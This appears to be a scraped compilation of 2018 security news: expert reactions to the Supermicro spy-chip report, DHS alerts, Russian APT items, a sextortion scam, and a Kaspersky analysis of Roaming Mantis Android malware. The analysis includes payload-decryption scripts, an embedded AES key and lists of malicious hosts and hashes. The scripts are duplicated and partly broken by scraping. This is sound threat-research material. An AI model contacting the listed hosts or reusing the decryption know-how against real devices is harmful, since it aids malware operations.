“This attack is about as surprising as catching Cookie Monster with his hand in the cookie jar. Compromising digital assets has become industrialized with advanced threats’ careful planning and organization. These threat actors are playing a long game with pre-attacks like these that position themselves for devastating attacks down the road– they are testing their abilities and an organization’s vulnerabilities to see how far they can go. What is surprising is that it has only taken decade or two for the digital world to become so inter-dependent – not just with hardware but with software -- today many systems have so much code in common that any upstream compromise is a widespread threat.
Yes, executives at top companies should be concerned, but they should have been concerned yesterday. CISO’s should operate under the assumption that they have live vulnerabilities on their network at all times because chances are they either have their own Edward Snowden on their hands or are exposed to external adversaries ranging from a basement script kiddie to a nation state-sponsored APT. Monitoring, both deeply and broadly, and useful security analytics that combine different data sources are the only way these kinds of threats will ever be detected or controlled. Companies have to start understanding that they can't sit around and patch their way to a secure network. On a positive note, now that this vulnerability has been detected, it’s going to get harder to fly under the radar because companies will know what to look for.”

Sanjay Beri, CEO, Netskope:

“Chinese cyber infiltration is nothing new, as proven by ongoing recent attacks from elite Chinese institutions diligently working to gain access to assets from the west. Today’s news proves that it’s clear we have exited the honeymoon period created by the deal President Obama struck with President Xi Jinping in back in 2015, where the two pledged that each of their governments would refrain from targeted cyber attacks toward another for commercial gain.

As economic tensions continue to escalate between nation states and the US, organizations -- especially those operating in high-risk sectors such as energy, manufacturing, government, etc. -- need to remain watchful and on high-alert in order to ensure their sensitive data is protected and inaccessible to foreign entities. Given the nature of this attack was at the hardware level, there are bound to be even more complex ramifications of those affected, as these types of breaches are far less simple to rectify than those at the software level.”

Itzik Kotler, CTO and Co-Founder, SafeBreach:

“Like many recent attacks, this is low-level, stealthy, and widespread. The combination of these three makes it especially frightening at first, and it certainly is rare to see such an attack in the wild.

However, no attack is ever a "one and done" operation. Even a compromised server isn't, by itself, a success for an attacker. Stolen data always needs to be retrieved. Or that server needs to be used to download, install, or run further attacks. It's for these reasons that enterprises employ layered defense, or "defense in depth" strategies that try to stop attacks at various points throughout their environment.

We must assume that no security, at any point, is 100% effective - and this attack is just another example. However, with the right layered defense, validated to ensure it's working as intended, even something like a hardware attack doesn't end up becoming a single point of failure.”

Dave Weinstein, VP Threat Research, Claroty:

“While the denials from Apple and Amazon have been relatively unprecedented in their strength and specificity, the reality is that the supply chain – for everything from consumer products, to technology, to heavy machinery – has been a perpetual source of concern for many years as a morass of potential exposure, and one that renders most security tools obsolete.

Regardless of where the claims of the story shake out, there are two immutable facts. First, we have a preponderance of evidence that supply chain compromise is not only possible at multiple levels, it’s happening. Second, China has proven its willingness pursue advantage by any means necessary, and as the world's de-facto factory of IT components, this is the “high ground” advantage that they are willing to exploit. Likely even more willing given recent developments in trade policy between the U.S. and China.”

Rick Moy, Chief Marketing Officer at Acalvio:

"While there’s a lot of denial about the attacks, it’s completely plausible that China did in fact seed certain hardware with these backdoor chips. One can imagine the liabilities that firms would rather not take on by admitting this kind of a breach. However, it is entirely within the capabilities and mission scope of nation state intel armies to infiltrate supply chains in this way. Although, the ramifications are more serious than embedding malicious software because they could bring wholesale sanctions against the vendors in question, which is what we have been seeing on an informal basis for a while now."

Joseph Carson, chief security scientist at Thycotic:

“We are one step away from a major cyber conflict or retaliation that could result in serious implications. This could be one of the biggest hacks in history. What is clear is that it is a government behind this cyber espionage and I believe it is compromised employees with privileged access that are acting as malicious insiders selecting specific targets so the supply chain has been victim of being compromised. The motive will not be clear until exact details of the hardware chip is reversed to know what it is capable of and who are the victims since no one is owning up from any of the Super Micro’s customers.

It is too early to tell until more evidence is made transparent and any victims own up to this. What is clear is that Super Micro must conduct an Incident Response to determine the actual evidence behind these allegations so that transparency and a motive is revealed and that the nation state behind such compromise can be held responsible.”

Malcolm Harkins, Chief Security and Trust Officer, Cylance:

“Unfortunately the only surprising element about this attack is that it’s taken so long to be uncovered in a report. Supply chain compromise has been a concern for a long time, and there are multiple nation states with endless motivations who make attacks of this scale a certainty rather than a probability.

Adversaries have a wealth of choices of how to execute. From leaving extra bits in software to compromising a validation engineer, the options are endless if the threat actor has the time, money, and capacity. Organizations must combat this by remaining vigilant about where the hardware and software has been. Some software such as the BIOS and firmware is often written by external sources and not the hardware manufacturer. If you have a distrust for the location that it is being created, or uncertain about the security validation performed then you need to implement additional validation or in some case different validation. Evident by Meltdown/Spectre, the hardware industry including the semiconductor industry has historically validated technology by testing for the functionality they want to see exist rather than exploring potentially dangerous alternatives that can create harm. Simply put, companies are essentially testing a light switch to see if it turns on and off when it goes up and down, but they’re ignoring the implications of switching it left and right.

Historically speaking, this level of testing has not been done because nobody has demanded it. Extra validation costs extra dollars and slows down time to market. Similar to age old Ford Pinto case, organizations are looking at business risks to themselves rather than the risk to the computing ecosystem and therefore society. Until this way of thinking changes, we will continue to see the potential for nation-state exploits such as this one.”

Tim Bandos, Vice President, Cybersecurity, Digital Guardian:

“The fact that China manufactures many of the components that go into servers, it would be relatively simple to install and disguise a hidden chip enabling backdoor communications and control with those endpoints. Also, given where these chips reside – lower in the stack – most technologies such as EDR and AV have a visibility gap and wouldn't be able to identify anything being tampered with at the hardware-level. This (once again) demonstrates that determined adversaries have capabilities exceeding that of defenders; hopefully, this will inspire the development of methods and techniques to detect when hardware tampering has taken place. Until then, diversifying supply chain vendors and staying vigilant on outbound and inbound network traffic is highly advised.”

Neelima Rustagi, Senior Director, Product Management, Demisto:

"Although the veracity of the accusations has yet to be confirmed, it highlights a couple of worrying security trends. Firstly, no abstraction layer is safe from attack. While intrusions on the application, OS, and software layer are more visible and get talked about more, attacks that exploit hardware such as the recent Foreshadow attack can be tougher to spot for security tools. Secondly, organizations need to think of ‘supply chain security’ in addition to product/network security. Since product manufacture today straddles across nations and industries – each with their own regulations, mores, and political climates – organizations should be cognizant of processes, vendor relationships, and regulatory requirements for each step of the product lifecycle."


DHS Warns of Threats to Precision Agriculture
7.10.2018 securityweek
BigBrothers

Relying on various embedded and connected technologies to improve agricultural and livestock management, precise agriculture is exposed to vulnerabilities and cyber-threats, a new report from the United States Department of Homeland Security (DHS) warns.

The adoption of precision agriculture technology has increased, which has also introduced various cyber risks. By exploiting vulnerabilities in precision agriculture technologies, an attacker could not only access sensitive data and steal resources, but also tamper with or destroy equipment.

Technologies used in precision agriculture “rely on remote sensing, global positioning systems, and communication systems to generate big data, data analytics, and machine learning,” the DHS report (PDF) says.

The findings of the report stem from visits and interviews at large farms and precision agriculture technology manufacturers in the United States. Technologies that allow for a more precise application of agricultural and livestock management inputs (fertilizer, seeds, and pesticides) to lower costs and improved yields, also expose the agricultural sector to vulnerabilities, the paper reads.

Cyber threats facing precision agriculture’s embedded and digital tools, however, are consistent with those other connected industries are exposed to as well. The malicious attacks targeting these tools usually have the same purpose too, including data and resource theft, reputation loss, destruction of equipment, or gaining an improper financial advantage over a competitor.

“Therefore, improper use of USB thumb drives, spear-phishing, and other malicious cyber-attacks, are readily available threat vectors for an attack; and the generally accepted mitigation techniques in other industries are largely sufficient for creating a successful defense-in-depth strategy for precision agriculture,” the report notes.

What makes precision agriculture unique, however, is the fact that a highly mechanical labor-intensive industry is now connected online, which dramatically increases the attack surface for threat actors. Thus, threats that would otherwise be viewed as common, “may have unique and far-reaching consequences on the agricultural industry,” the DHS says.

According to the report, precision agriculture isn’t only exposed to cyber-attacks, but also faces dangers such as natural disasters, terrorist attacks, equipment breakdown, or insider threats.

Key threats to the sector include intentional theft of data, intentional publishing of confidential information, access to unmanned aerial system (UAS) data, sale of confidential data, falsification of data for disruption purposes, introduction of rogue data to damage a crop or herd, disruption to positioning, navigation, and timing (PNT) systems, and disruption to communication networks.

The report also reveals a series of key controls designed to mitigate the threats: email and browser protections, control over network ports and hardware and software assets, account monitoring, data recovery capabilities, data protection, and incident response and management, among other.

“Adoption of information security standards for precision agriculture is important for the future success of precision agriculture, along with industry efforts for equipment interoperability and data use / privacy. Vetted best practices, borne from hard experience learned in other sectors which have proceeded agriculture in the digital revolution, offer a proven path for data security,” the report reads.


Russian State-Sponsored Operations Begin to Overlap: Kaspersky
7.10.2018 securityweek
BigBrothers

Kaspersky Lab security researchers have uncovered new evidence that shows overlaps between the activity of infamous Russian cyber-espionage groups Turla and Sofacy.

Earlier this year, Kurt Baumgartner, principal security researcher, Kaspersky Lab, revealed that activity associated with the Sofacy group, which is also known as APT28, Fancy Bear, Pawn Storm, Sednit and Strontium, appeared to overlap with that of other state-sponsored operations.

The researcher said at the time that Sofacy’s Zebrocy malware had been discovered on machines also infected with Mosquito, a backdoor previously associated with Turla. The shared victims included organizations in Europe and Asia.

Amid an evolution in the tactics, techniques and procedures (TTPs) employed by the Turla group, also tracked as Snake, Venomous Bear, Waterbug, and Uroboros, Kaspersky Lab has observed further connections with Sofacy, as well as more evidence linking Turla to WhiteBear.

Specifically, the security researchers discovered that Turla’s KopiLuwak malware is employing a delivery mechanism that uses code nearly identical to that previously seen in the Zebrocy operation.

As part of the attack, Turla employed a new spear-phishing delivery vector, relying on Windows shortcut (.LNK) files for malware delivery. The LNK file, Kaspersky discovered, contained PowerShell code almost identical to that used in Zebrocy activity a month earlier.

The investigation also uncovered target overlaps between the two threat actors, focused on sensitive political targets, including government research and security entities, diplomatic missions and military affairs, mainly in central Asia.

The KopiLuwak malware isn’t new, being first associated with the Turla hackers nearly two years ago. In mid-2018, however, the threat actor started using an evolved variant of the malware, targeting entities in Syria and Afghanistan.

KopiLuwak emerged in 2016 as an evolution from IcedCoffee, Turla’s first foray into full-fledged JavaScript backdoors. Focusing on European governments but more selectively deployed, KopiLuwak performs comprehensive system and network reconnaissance, can run arbitrary system commands and uninstalls itself and leaves little evidence for investigators to work with.

In a newly published report, Kaspersky details the discovery and also provides information on the evolution of the KopiLuwak JavaScript backdoor, along with details on the changes observed in the group’s Carbon framework and in the Meterpreter and Mosquito malware delivery techniques.

Turla is expected to continue to update and use the Carbon framework code into 2019 within Central Asia and related remote locations. The group is also expected to use open-source based or inspired fileless components and memory loaders from the Mosquito malware, Kaspersky says.

“It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group,” Kaspersky notes.


US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping Organizations
6.10.2018 securityaffairs 
BigBrothers

US DoJ indicted seven defendants working for the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.
The news of the day is that a US DoJ indicted seven defendants working for the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.

The defendants are Aleksei Sergeyevich Morenets, Evgenii Mikhaylovich, Serebriakov, Ivan Sergeyevich Yermakov, Artem Andreyevich Malyshev, and Dmitriy Sergeyevich Badin, who work for the Military Unit 26165, and GRU officers Oleg Mikhaylovich Sotnikov and Alexey Valerevich Minin.

The hackers were involved in a cyber operation aimed at discrediting the international anti-doping organizations and officials that revealed athlete doping program sustained by Moscow.

The GRU officers hacked into the accounts of officials at the anti-doping organizations to steal confidential data and spread them to and delegitimize them.

According to prosecutors, defendants also attempted to spread the fake news on doping programs followed by athletes from other countries.

“According to the indictment, beginning in or around December 2014 and continuing until at least May 2018, the conspiracy conducted persistent and sophisticated computer intrusions affecting U.S. persons, corporate entities, international organizations, and their respective employees located around the world, based on their strategic interest to the Russian government.” reads the DoJ press release.

“State-sponsored hacking and disinformation campaigns pose serious threats to our security and to our open society, but the Department of Justice is defending against them,” said Attorney General Jeff Sessions. “Today we are indicting seven GRU officers for multiple felonies each, including the use of hacking to spread the personal information of hundreds of anti-doping officials and athletes as part of an effort to distract from Russia’s state-sponsored doping program. The defendants in this case allegedly targeted multiple Americans and American entities for hacking, from our national anti-doping agency to the Westinghouse Electric Company near Pittsburgh. We are determined to achieve justice in these cases and we will continue to protect the American people from hackers and disinformation.”
The Russian state-sponsored hackers have spread fake news via social media accounts and other infrastructure acquired and maintained by GRU Unit 74455 in Russia.

The cyber spies were operating under the name of a false hacktivist group calling itself the “Fancy Bears’ Hack Team.”

“As part of its influence and disinformation efforts, the Fancy Bears’ Hack Team engaged in a concerted effort to draw media attention to the leaks through a proactive outreach campaign,” continues the press release.

“The conspirators exchanged e-mails and private messages with approximately 186 reporters in an apparent attempt to amplify the exposure and effect of their message.”

The indictments of the seven GRU members is the latest in a string of similar actions against Russian agents involved in hacking activities.

In July, the special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.


DHS issued an alert on attacks aimed at Managed Service Providers
6.10.2018 securityaffairs 
BigBrothers

The United States Department of Homeland Security (DHS) is warning of ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).
The DHS issued an alert on ongoing attacks aimed at global managed service providers (MSPs) that are carried out by an advanced APT group.

Managed services is the practice of outsourcing on a proactive basis certain processes and functions intended to improve operations and cut expenses. It is an alternative to the break/fix or on-demand outsourcing model where the service provider performs on-demand services and bills the customer only for the work done.

The use of MSP is increasing the attack surface for attackers, the DHS’ alert TA18-276B, is related to activity that was uncovered by DHS’ National Cybersecurity and Communications Integration Center (NCCIC) in April 2017.

“The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service providers (MSPs).” reads the alert issued by DHS.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.”

Security firms attributed the attacks to a Chinese threat actor referred as APT10 (aka menuPass and Stone Panda).

managed service

The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

The ANEL malware was already seen in the previous attack as a beta version or release candidate. In September, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at Japanese media sector

The hackers used a broad range of malware in their campaigns, including PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler, and ZeroT.

DHS alert also provides technical information on detection, response and mitigation for this specific threat.


Experts warns of a new extortion campaign based on the Breach Compilation archive
6.10.2018 securityaffairs 
Spam

Cybaze ZLab spotted a new scam campaign that is targeting some of its Italian customers, crooks leverage credentials in Breach Compilation archive.
Security experts from Cybaze ZLab have spotted a new scam campaign that is targeting some of its Italian customers.

Crooks attempted to monetize the availability of a huge quantity of credentials available in the underground market to target unaware netizens in a new extortion scheme.

The number of spam messages associated with this campaign is rapidly increasing, the attackers behind this campaign used the credentials collected in the infamous database dubbed ‘Breach Compilation’.

This Breach Compilation archive contains about 1.4 Billion of clear text credentials gathered in a series of data breaches.

At the time it is still unclear if the attackers have created a pool of emails used in the spam campaign or are exploiting credential stuffing attack to attempt to access email accounts of unaware users and use them to send out spam messages.

The credential stuffing attacks involve botnets to try stolen login credentials usually obtained through phishing attacks and data breaches. This kind of attacks is very efficient due to the bad habit of users of reusing the same password over multiple services.

In the following image is reported as an example, one of the messages used in this campaign.

The message is a classical email scam used by cyber criminals to threaten the victim to reveal to the public that he watches porn videos. Crooks claim to have the recording of the victim while watching the videos, but it is absolutely false.

Crooks blackmail the victims and request the payment of a fee in Bitcoin to avoid spreading the video.

To be more convincing and trick victims into paying the fee, the hackers include in the body of the email the password used by the victim as a proof of the attack. This password was extracted from the Breach Compilation archive.

Experts from Cybaze have analyzed several samples of email belonging to this campaign, most of them in English. One of their customers received a scam message in a poor Italian-writing.

Crooks ask the victims to pay a fee of $3000 worth of Bitcoin, while the message written in Italian ask for $350, a circumstance that suggests that other threat actors are using the same technique.

The attackers may have implemented an automated mechanism to send scam emails to the addresses in the archive and create for each of them a Bitcoin wallet.

Experts from Cybaze have analyzed a couple of wallets associated with the scam messages, in one case they found a number of transactions that suggest victim made the payment.

The Bitcoin address with associated 9 transactions is 1Lughwk11SAsz54wZJ3bpGbNqGfVanMWzk

It is essential to share awareness about this campaign to avoid that other victims will fail victims of this type of extortion.

As usual, let me suggest to avoid use same credentials across multiple web services, you can check if your email is involved in a data breach by querying the free service


Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system
5.10.2018 Kaspersky
Apple

In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. In the beginning, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, including multiple countries from Asia and beyond, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

You can check previous chapters of this research here:

Roaming Mantis uses DNS hijacking to infect Android smartphones (April 2018)
Roaming Mantis dabbles in mining and phishing multilingually (May 2018)
In addition we would like to thank and credit security researchers from LAC Co. Ltd. for a very insightful article describing how vulnerable routers were compromised by the Roaming Mantis group, which was disclosed in their Japanese blogpost in June 2018. According to this research, the threat actor logged in to their router using default ID and password, and changed legitimate DNS settings to rogue DNS settings, where the router’s control panel was accessible over the Internet.

The Roaming Mantis group did not stop its activities after publication or our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods such as web crypto mining for iOS devices, spreading via malicious content delivery system and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

Web crypto-mining for iOS devices
The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

Part of HTML source code of the malicious landing page for iOS

The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

Screen capture of the landing page and CPU monitoring tool

Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

Filtering Japanese devices
One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. The new feature was added in the landing page to filter out Japanese environment:

Added confirmation of Japanese environment for filtering

It looks like they want to slow down infections of Japanese targets for the time being.

Spreading via another malware delivery system
In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “Trojan-Banker.AndroidOS.Wroba.al”, were still being detected by our customers, according to our KSN data.

Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

Our deeper investigation revealed that their new malware spreading method was the one used by other Android malware, the “sagawa.apk” delivery system. We published a Japanese blogpost of this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. According to our previous blogpost, the infection vector involved users received a phishing SMS message spoofing a notification from a Japanese delivery company. The message contained a malicious URL. If the user clicked it, the server displayed a fake web site that downloaded and installed the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

Type A Type B
File name sagawa.apk sagawa.apk
md5 956f32a28d0057805c7234d6a13aa99b a19f4cb93274c949e66efe13173c95e6
File size 427KB (437,556) 2.3MB (2,381,665)
Loader module \classes.dex \classes.dex +
\lib\arm64-v8a\libkao.so
\lib\armeabi-v7a\libkao.so
\lib\x86\libkao.so
\lib\x86_64\libkao.so
Encrypted payload (enc_data) \assets\a \assets\code.so
Decrypt algorithm payload = base64_dec(zlib_dec(enc_data)); aes_key = base64_dec(hardcoded data);
payload = AES_dec(enc_data, aes_key);
Alias MaqHao (McAfee)
XLoader (TrendMicro) FAKESPY (TrendMicro)
Old file name facebook.apk
chrome.apk
${random}.apk sagawa.apk
Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

Japanese messages displayed to infected users

In addition, this malware confirms whether a domestic Japanese prepaid card application is installed on the infected device.

Check for the domestic Japanese prepaid card application “Au Wallet”

If the application is installed on the device, the malware downloads and installs a fake application as its update.

Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

Researchers may use the following simplified python scripts to extract the payload from “sagawa.apk”:

sagawa.apk_typeA_payload_extractor.py

#!/usr/bin/env python

import sys
import zlib
import base64

data = open(sys.argv[1],"rb").read()
dec_z = zlib.decompress(data)
dec_b = base64.b64decode(dec_z)

with open(sys.argv[1]+".dec","wb") as fp:
fp.write(dec_b)
1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/env python

import sys
import zlib
import base64

data = open(sys.argv[1],"rb").read()
dec_z = zlib.decompress(data)
dec_b = base64.b64decode(dec_z)

with open(sys.argv[1]+".dec","wb") as fp:
fp.write(dec_b)
sagawa.apk_typeB_payload_extractor.py

#!/usr/bin/env python

import sys
from Crypto.Cipher import AES, ARC4
import base64

data = open(sys.argv[1],"rb").read()
key = sys.argv[2]
aes_key = base64.b64decode(key) // key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so
aes = AES.new(aes_key)
dec = aes.decrypt(data)

with open(sys.argv[1]+".dec","wb") as fp:
fp.write(dec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python

import sys
from Crypto.Cipher import AES, ARC4
import base64

data = open(sys.argv[1],"rb").read()
key = sys.argv[2]
aes_key = base64.b64decode(key) // key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so
aes = AES.new(aes_key)
dec = aes.decrypt(data)

with open(sys.argv[1]+".dec","wb") as fp:
fp.write(dec)
Spreading via prezi.com like a scam
We also observed another malware distribution method of Roaming Mantis which is linked to prezi.com. Prezi is a popular computer application and online service to create dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult video, a game, a comic, music and so on, like pirate editions.

Redirection to a scam page

Based on our research, there were multiple messages leveraging different social engineering tricks to invite users to a scam website. On the other hand, the Roaming Mantis’ landing page was found to be linked to several such accounts carrying out redirections.

Corrupted landing page code from Roaming Mantis posted on prezi.com

However, fortunately this code does not work because of mistakes made during the code preparation stage.

Records of stolen data
Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

Suspected stolen data from victims’ Android devices

This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including cvv, bank information, and secret question and answer in Simplified Chinese. Data headers in Chinese suggest that the attackers are fluent in Chinese – unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate victims’ geography. Below is a pie chart created from the language data:

Victims’ language settings (download)

The top language is “en-us” (39%), the second is “ko-kr”, the third is “ru”. Judging from this data, victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and the new distribution strategies. The reason why the “en-us” is the most popular could be because English is used as second language in several countries.

Conclusions
In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. It seems that the attack doesn’t stop developing. In our recent research, we found that they probed using a web miner for iOS, instead of redirecting to a fake Apple website.

Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

Roaming Mantis is also trying to spread its malware via prezi.com, with a scam that offers a visitor free content such as videos and more.

Judging from the list of stolen credentials, the attackers seems to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe that this is just a tip of the iceberg.

We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

Kaspersky Lab products detect this malware with the following verdict:

HEUR:Trojan-Banker.AndroidOS.Wroba
IoCs
Malicious hosts:
59.105.6[.]230
sagawa-otqwt[.]com
sagawa-polsw[.]com
Hashes of Type A:
956f32a28d0057805c7234d6a13aa99b sagawa.apk
3562f9de6dbe70c2e19a20d8683330ce \classes.dex
01fa0039b62c5db8d91dfc6b75b246f8 decrypted payload (dex file) from \assets\a
Hashes of Type B:
a19f4cb93274c949e66efe13173c95e6
5e913208ecc69427efb6bbf9e6505624 \classes.dex
67bc2e8beb14b259a5c60fe7a31e6795 \arm64-v8a/libkao.so
f120f5f78c7ef762996314cf10f343af \armeabi-v7a/libkao.so
efe54c22e2b28a44f723d3479487620c \x86_64/libkao.so
e723c6aec4433f3c6e5d3d24fe810e05 \x86/libkao.so
daeccda295de93cf767fd39a86a44355 decrypted payload (jar file) from \assets\code.so
581b08b277a8504ed222a71c19cea5f9 classes.dex from decrypted payload


China planted tiny chips on US computers for cyber espionage

5.10.2018 securityaffairs BigBrothers

China used tiny chips implanted on computer equipment manufactured for US companies and government agencies to steal secret information.
According to a report published by Bloomberg News, China used tiny chips implanted on computer equipment manufactured for US companies and government agencies, including Amazon and Apple, to steal secret information.

The tiny chips have a size of a grain of rice, they were discovered after an investigation that is still ongoing and that that started three years ago.

“Nested on the servers’ motherboards, the testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design. Amazon reported the discovery to U.S. authorities, sending a shudder through the intelligence community.” reads the report.

tiny chips spy China

The tiny chips were used as a “stealth doorway” into computer equipment, a hardware backdoor very hard to detect.

According to unnamed US officials cited in the report, the spying hardware was designed by a unit of the People’s Liberation Army and was inserted on equipment manufactured in China for US-based Super Micro Computer Inc.

Amazon discovered the tiny chips when it acquired software firm Elemental and conducted a security assessment of equipment made for Elemental by California-based Supermicro.

Elemental manufactured equipment for Department of Defense data centers, the CIA’s drone operations, and onboard networks of Navy warships.

“Elemental also started working with American spy agencies. In 2009 the company announced a development partnership with In-Q-Tel Inc., the CIA’s investment arm, a deal that paved the way for Elemental servers to be used in national security missions across the U.S. government.” continues the report.

“Public documents, including the company’s own promotional materials, show that the servers have been used inside Department of Defense data centers to process drone and surveillance-camera footage, on Navy warships to transmit feeds of airborne missions, and inside government buildings to enable secure videoconferencing. NASA, both houses of Congress, and the Department of Homeland Security have also been customers. This portfolio made Elemental a target for foreign adversaries.”

The tiny chips were designed to be implanted directly on the motherboards, the backbone for computer equipment used in data centers of the major US firms.

Amazon confirmed that it was not aware of the supply chain compromise.

“It’s untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental,” Amazon wrote.

Apple denied having found the spy chips on his equipment.

“On this we can be very clear: Apple has never found malicious chips, ‘hardware manipulations’ or vulnerabilities purposely planted in any server,” Apple wrote.


Canada Says it Was Targeted by Russian Cyber Attacks
5.10.2018 securityaffairs
BigBrothers

Canada said Thursday it too was targeted by Russian cyber attacks, citing breaches at its center for ethics in sports and at the Montreal-based World Anti-Doping Agency, after allies blamed Moscow for some of the biggest hacking plots of recent years.

"The government of Canada assesses with high confidence that the Russian military's intelligence arm, the GRU, was responsible" for these cyber attacks, the foreign ministry said in a statement.

Ottawa said these formed "part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order."

And it called on "all those who value this order to come together in its defence."

Allies accused Russia military intelligence of being behind an April attempt to gain access to official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

The Netherlands expelled four alleged agents and Britain and Australia pointed fingers at Russian military intelligence, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The Russia-based Fancy Bears computer hacking group leaked athletes' medical records held by WADA, said the agency.

The same year, the Canadian Centre for Ethics in Sport was "compromised by malware enabling unauthorized access to the Centre's network," the foreign ministry said.

WADA has faced a backlash over its decision last month to lift a ban on Russia's anti-doping agency.

The agency had suspended RUSADA in November 2015 after declaring it non-compliant following revelations of a vast state-backed scheme to avoid drug testers.

A WADA report by Canadian lawyer Richard McLaren accused Russian authorities of running an elaborate doping program with the full support of the Russian Ministry of Sport and the Russian secret service (FSB).

The softening of WADA's stance triggered outrage from athletes and national anti-doping agencies around the world, who have accused WADA of succumbing to pressure from the IOC.


US to Let NATO Use its Cyber Defense Skills
5.10.2018 securityaffairs
BigBrothers

The United States is expected to make its offensive cyber warfare capabilities available to NATO, officials said Wednesday, as the alliance seeks to strengthen its defenses against Russian electronic attacks.

Britain and Denmark have already publicly committed cyber resources to NATO, and Washington is expected to announce that it will follow suit on Thursday at a meeting of defence ministers in Brussels.

Alliance chief Jens Stoltenberg said cyber attacks on NATO countries were becoming "more frequent... more sophisticated... more coercive" and any contribution of cyber capabilities was welcome.

"We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict," Stoltenberg said.

The three Baltic states -- Lithuania, Latvia and Estonia -- say they come under near-daily cyber assault, with government departments, banking systems and the power grid coming in for attack, and point the finger at former Soviet ruler Russia.

Moscow is also blamed for interfering in various European elections through campaigns of disinformation on social media.

Most recently, Washington accused Russia of leading a disinformation campaign in Macedonia through social media to discourage voters from taking part in last weekend's referendum on changing the country's name.

The name change is crucial to Macedonia's hopes of joining NATO -- a step Moscow opposes.


North Korean Attacks on Banks Attributed to 'APT38' Group
5.10.2018 securityweek
APT

A report published on Wednesday by FireEye details the activities of a financially motivated threat actor believed to be operating on behalf of the North Korean government.

